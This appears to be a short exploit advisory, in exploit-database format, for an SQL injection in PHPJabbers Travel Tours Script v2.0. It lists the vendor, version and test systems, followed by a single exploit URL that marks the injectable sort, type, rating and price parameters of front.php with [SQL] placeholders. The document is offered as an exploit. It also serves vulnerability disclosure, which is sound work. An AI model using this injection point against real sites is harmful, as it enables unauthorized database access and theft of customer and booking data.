18 lines
No EOL
696 B
Text
18 lines
No EOL
696 B
Text
# # # # #
|
|
# Exploit Title: Travel Tours Script v2.0 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 11.03.2017
|
|
# Vendor Homepage: https://www.phpjabbers.com/
|
|
# Software: https://www.phpjabbers.com/travel-tours-script/
|
|
# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1
|
|
# Version: 2.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail: ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]
|
|
# Etc..
|
|
# # # # # |